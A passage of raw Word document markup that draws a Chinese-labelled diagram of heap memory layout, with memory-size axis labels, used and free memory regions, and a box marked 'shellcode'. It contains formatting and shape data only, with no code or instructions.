                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                          </w:rPr>
                          <w:t>0MB</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="文本框 96" o:spid="_x0000_s1114" type="#_x0000_t202" style="position:absolute;left:27776;top:15443;width:5969;height:3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Ix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hVaekQn06hcAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAqDbIxxQAAANwAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="1CD4D9B3" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                          </w:rPr>
                          <w:t>100MB</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="文本框 96" o:spid="_x0000_s1115" type="#_x0000_t202" style="position:absolute;left:27776;top:8629;width:596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eqwgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X/A/LFLzVTRRKEl2lCEIO9dBU8Tpkp0lodjbubjX+e1cQepvH+5zVZjS9uJDznWUF6SwBQVxb&#10;3XGj4PC9e8tA+ICssbdMCm7kYbOevKyw0PbKX3SpQiNiCPsCFbQhDIWUvm7JoJ/ZgThyP9YZDBG6&#10;RmqH1xhuejlPkndpsOPY0OJA25bq3+rPKNhv8yor5zd3yhflrsrOqf3MjkpNX8ePJYhAY/gXP92l&#10;jvPTHB7PxAvk+g4AAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBFQReqwgAAANwAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="093C814B" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                          </w:rPr>
                          <w:t>200MB</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="文本框 96" o:spid="_x0000_s1116" type="#_x0000_t202" style="position:absolute;left:27785;top:2759;width:596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SKxQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8Mw&#10;DIXvg/4Ho8Juq9MMRprVLaVQyGE7LOvYVcRaEhrLqe226b+fDoPdJN7Te5/W28kN6koh9p4NLBcZ&#10;KOLG255bA8fPw1MBKiZki4NnMnCnCNvN7GGNpfU3/qBrnVolIRxLNNClNJZax6Yjh3HhR2LRfnxw&#10;mGQNrbYBbxLuBp1n2Yt22LM0dDjSvqPmVF+cgff9qi6q/B6+V8/VoS7OS/9WfBnzOJ92r6ASTenf&#10;/HddWcHPBV+ekQn05hcAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAaF3SKxQAAANwAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="28DD5F0A" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                          </w:rPr>
                          <w:t>300MB</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="文本框 96" o:spid="_x0000_s1117" type="#_x0000_t202" style="position:absolute;left:7013;top:7580;width:856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9ERwgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X/A/LCN7qJhFKjK4igpBDPTRt8TpkxySYnY27W43/3i0UepvH+5z1djS9uJHznWUF6TwBQVxb&#10;3XGj4Ovz8JqD8AFZY2+ZFDzIw3YzeVljoe2dP+hWhUbEEPYFKmhDGAopfd2SQT+3A3HkztYZDBG6&#10;RmqH9xhuepklyZs02HFsaHGgfUv1pfoxCo77ZZWX2cOdlovyUOXX1L7n30rNpuNuBSLQGP7Ff+5S&#10;x/lZCr/PxAvk5gkAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQB1W9ERwgAAANwAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="73E2FDA1" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>已使用内存</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:rect id="矩形 122" o:spid="_x0000_s1118" style="position:absolute;left:2828;top:7964;width:4188;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HljwgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X+h+WKfRWN+YgkrqKCoqHFjSa+5CdJjHZ2bC7mrS/visUepvH+5zFajSduJPzjWUF00kCgri0&#10;uuFKweW8e5uD8AFZY2eZFHyTh9Xy+WmBmbYDn+ieh0rEEPYZKqhD6DMpfVmTQT+xPXHkvqwzGCJ0&#10;ldQOhxhuOpkmyUwabDg21NjTtqayzW9GgS/wc7rRZiiK/fXjpzq2Lp+1Sr2+jOt3EIHG8C/+cx90&#10;nJ+m8HgmXiCXvwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBv3HljwgAAANwAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" fillcolor="#7f7f7f [1612]" strokecolor="black [3200]" strokeweight="1pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="4EE162FF" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00747D3A" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 123" o:spid="_x0000_s1119" style="position:absolute;left:34338;top:1343;width:15678;height:18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03FFB4A0" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00734F55" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 124" o:spid="_x0000_s1120" style="position:absolute;left:34329;top:19418;width:15635;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SMwgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X/A/LCL3VjVKkRFdRocWDhTaa+5Adk5jsbNhdTeyv7xYK3ubxPme5HkwrbuR8bVnBdJKAIC6s&#10;rrlUcDq+v7yB8AFZY2uZFNzJw3o1elpiqm3P33TLQiliCPsUFVQhdKmUvqjIoJ/YjjhyZ+sMhghd&#10;KbXDPoabVs6SZC4N1hwbKuxoV1HRZFejwOf4Od1q0+f5x+XwU341Lps3Sj2Ph80CRKAhPMT/7r2O&#10;82ev8PdMvECufgEAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCPeUSMwgAAANwAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" fillcolor="#7f7f7f [1612]" strokecolor="black [3200]" strokeweight="1pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="2006BB8B" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="004C22B0" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="文本框 125" o:spid="_x0000_s1121" type="#_x0000_t202" style="position:absolute;left:2193;top:1279;width:16123;height:4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cSwwAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X/A/LCN7qxkhLTF1FBCEHPTQqvQ7ZaRKanY27q8Z/7xYKvc3jfc5yPZhO3Mj51rKC2TQBQVxZ&#10;3XKt4HTcvWYgfEDW2FkmBQ/ysF6NXpaYa3vnT7qVoRYxhH2OCpoQ+lxKXzVk0E9tTxy5b+sMhghd&#10;LbXDeww3nUyT5F0abDk2NNjTtqHqp7waBYftosyK9OG+FvNiV2aXmd1nZ6Um42HzASLQEP7Ff+5C&#10;x/npG/w+Ey+QqycAAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEACmDXEsMAAADcAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="150F459F" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00962DDC" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:rPr>
                            <w:sz w:val="28"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00962DDC">
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                            <w:sz w:val="28"/>
                          </w:rPr>
                          <w:t>常规情况下堆布局</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:rect id="矩形 126" o:spid="_x0000_s1122" style="position:absolute;left:34336;top:24204;width:15636;height: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39gwgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X+h+WKfRWN3oIkrqKCoqHFjSa+5CdJjHZ2bC7mrS/visUepvH+5zFajSduJPzjWUF00kCgri0&#10;uuFKweW8e5uD8AFZY2eZFHyTh9Xy+WmBmbYDn+ieh0rEEPYZKqhD6DMpfVmTQT+xPXHkvqwzGCJ0&#10;ldQOhxhuOjlLklQabDg21NjTtqayzW9GgS/wc7rRZiiK/fXjpzq2Lk9bpV5fxvU7iEBj+Bf/uQ86&#10;zp+l8HgmXiCXvwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAQ539gwgAAANwAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" fillcolor="#7f7f7f [1612]" strokecolor="black [3200]" strokeweight="1pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="2D225008" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00A47BED" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 127" o:spid="_x0000_s1123" style="position:absolute;left:34336;top:22895;width:15636;height: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7wgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X/A/LCN7qRg+2RFdRocWDhTaa+5Adk5jsbNhdTdpf3y0UvM3jfc5qM5hW3Mn52rKC2TQBQVxY&#10;XXOp4Hx6e34F4QOyxtYyKfgmD5v16GmFqbY9f9E9C6WIIexTVFCF0KVS+qIig35qO+LIXawzGCJ0&#10;pdQO+xhuWjlPkoU0WHNsqLCjfUVFk92MAp/jx2ynTZ/n79fjT/nZuGzRKDUZD9sliEBDeIj/3Qcd&#10;589f4O+ZeIFc/wIAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQB/q9r7wgAAANwAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" fillcolor="#7f7f7f [1612]" strokecolor="black [3200]" strokeweight="1pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="78FB8957" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 192" o:spid="_x0000_s1124" style="position:absolute;left:34338;top:22017;width:15634;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pwwAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X/A/LCL01Gz3YJmYVkRYKLRWjB49DdkyC2dmwu03iv+8WCr3N431OsZ1MJwZyvrWsYJGkIIgr&#10;q1uuFZxPb08vIHxA1thZJgV38rDdzB4KzLUd+UhDGWoRQ9jnqKAJoc+l9FVDBn1ie+LIXa0zGCJ0&#10;tdQOxxhuOrlM05U02HJsaLCnfUPVrfw2CuyhvXc7l30Nn/R8+TiEdJxWr0o9zqfdGkSgKfyL/9zv&#10;Os7PlvD7TLxAbn4AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA21PzKcMAAADcAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" fillcolor="white [3201]" strokecolor="black [3200]" strokeweight="1pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="3AB74038" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                            <w:szCs w:val="21"/>
                          </w:rPr>
                          <w:t> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 193" o:spid="_x0000_s1125" style="position:absolute;left:34336;top:20951;width:15634;height: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UfwgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X/A/LCL3VjRWkRlfRgtJDCzWa+5Adk5jsbNhdTdpf3y0UepvH+5zVZjCtuJPztWUF00kCgriw&#10;uuZSwfm0f3oB4QOyxtYyKfgiD5v16GGFqbY9H+mehVLEEPYpKqhC6FIpfVGRQT+xHXHkLtYZDBG6&#10;UmqHfQw3rXxOkrk0WHNsqLCj14qKJrsZBT7Hj+lOmz7PD9f37/Kzcdm8UepxPGyXIAIN4V/8537T&#10;cf5iBr/PxAvk+gcAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCjLxUfwgAAANwAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" fillcolor="#7f7f7f [1612]" strokecolor="black [3200]" strokeweight="1pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="3B7FD580" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 194" o:spid="_x0000_s1126" style="position:absolute;left:2828;top:11802;width:4185;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s7GwwAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0L/Q/LFLzppk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O/bOxsMAAADcAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" fillcolor="white [3201]" strokecolor="black [3200]" strokeweight="1pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="370AFD1E" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF67848" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="-118" w:left="-248" w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpc">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="325AE0B5" wp14:editId="636B41FD">
                <wp:extent cx="5274310" cy="3273818"/>
                <wp:effectExtent l="0" t="0" r="0" b="3175"/>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5" name="文本框 96"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="701662" y="1544009"/>
                            <a:ext cx="693420" cy="303530"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1A9C6516" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>s</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman"/>
                                </w:rPr>
                                <w:t>hellcode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6" name="文本框 96"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="701662" y="1164815"/>
                            <a:ext cx="723265" cy="304800"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="06BD166A" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>空闲内存</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文本框 96"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2907587" y="2350598"/>
                            <a:ext cx="463550" cy="254000"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="021BE891" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                </w:rPr>
                                <w:t>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文本框 96"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2777677" y="1544456"/>
                            <a:ext cx="596900" cy="304165"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6B259E58" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                </w:rPr>
                                <w:t>100MB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9" name="文本框 96"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2777677" y="863010"/>
                            <a:ext cx="596900" cy="304800"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1AC0DB85" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                </w:rPr>
                                <w:t>200MB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0" name="文本框 96"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2778568" y="275976"/>
                            <a:ext cx="596900" cy="305435"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="15A7D1B0" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
